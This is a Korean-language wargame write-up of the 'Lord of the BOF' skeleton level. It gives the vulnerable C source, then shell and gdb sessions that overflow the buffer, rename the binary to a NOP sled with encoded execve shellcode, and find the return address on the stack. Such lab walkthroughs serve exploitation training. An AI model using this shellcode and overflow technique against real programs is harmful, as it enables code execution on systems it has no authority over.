[LOB] vampire -> skeleton

/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
    char buffer[40];
    int i, saved_argc;
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    // egghunter 
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
 
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
 
    // check the length of argument
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }
 
    // argc saver
    saved_argc = argc;
 
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
 
        // buffer hunter
        memset(buffer, 0, 40);
 
    // ultra argv hunter!
    for(i=0; i<saved_argc; i++)
        memset(argv[i], 0, strlen(argv[i]));
}

모든 argv를 다 초기화 한다. 그러면 어떻게 할까? core를 떠서, 모든 스트링을 찾아보았다.

[vampire@localhost tmp]$ ./skeleton `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost tmp]$ gdb -q skeleton core 
Core was generated by `                                                           '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/x $esp
0xbffffac0:    0x00000000
(gdb) x/10000s 0xbffffac0
0xbffffac0:     ""
0xbffffac1:     ""
0xbffffac2:     ""
0xbffffac3:     ""
0xbffffac4:     "\004󾚰20󾦸\001@\002"
//생략
0xbfffffed:     ""
0xbfffffee:     ""
0xbfffffef:     ""
0xbffffff0:     ""
0xbffffff1:     "./skeleton"
0xbffffffc:     ""
0xbffffffd:     ""
0xbffffffe:     ""
0xbfffffff:     ""
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>

모두 초기화를 해도 이름 부분이 스텍에 남게된다. 이름을 쉘코드로 바꾸고 이름으로 넘겨주면 될것같다.

쉘코드는 0x2f가 포함되지 않은 쉘코드를 써야 한다.

[vampire@localhost tmp]$ mv skeleton `python -c 'print "A"+"\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
[vampire@localhost tmp]$ ls
A????????????????????????????????????????????????????????????????????????????????????????????????????龞1ɱ2?l?ÿ??羵󪀨쀿ÿ2i00tii0cjo?㐔?࿱?̿ 
[vampire@localhost tmp]$ ./Aꝑ^1ɱ2l^Nÿ^A蝁u󪝅髿ÿÿ2i00tii0cjo㐔⚱^L΁ `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost tmp]$ gdb -q Aꝑ^1ɱ2l^Nÿ^A蝁u󪝅髿ÿÿ2i00tii0cjo㐔⚱^L΁ core
warning: core file may not match specified executable file.
Core was generated by `                                                                        
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0xbfbfbfbf in ?? ()
(gdb) x/80x $esp
0xbffff920:    0x00000000    0xbffff964    0xbffff970    0x40013868
0xbffff930:    0x00000002    0x08048450    0x00000000    0x08048471
0xbffff940:    0x08048500    0x00000002    0xbffff964    0x08048390
0xbffff950:    0x080486ac    0x4000ae60    0xbffff95c    0x40013e90
//생략
0xbfffff60:    0x00000000    0x90412f2e    0x90909090    0x90909090
0xbfffff70:    0x90909090    0x90909090    0x90909090    0x90909090
0xbfffff80:    0x90909090    0x90909090    0x90909090    0x90909090
0xbfffff90:    0x90909090    0x90909090    0x90909090    0x90909090
0xbfffffa0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbfffffb0:    0x90909090    0x90909090    0x90909090    0x90909090
0xbfffffc0:    0x90909090    0x90909090    0xeb909090    0xc9315e11
0xbfffffd0:    0x6c8032b1    0x8001ff0e    0xf67501e9    0xeae805eb
0xbfffffe0:    0x32ffffff    0x306951c1    0x69697430    0x6f6a6330
0xbffffff0:    0x5451e48a    0xb19ae28a    0x0081ce0c    0x00000000
0xc0000000:    Cannot access memory at address 0xc0000000

0xbfffff80쪽에 보니 있다. RET값을 0xbfffff80으로 대입하고 실행하자.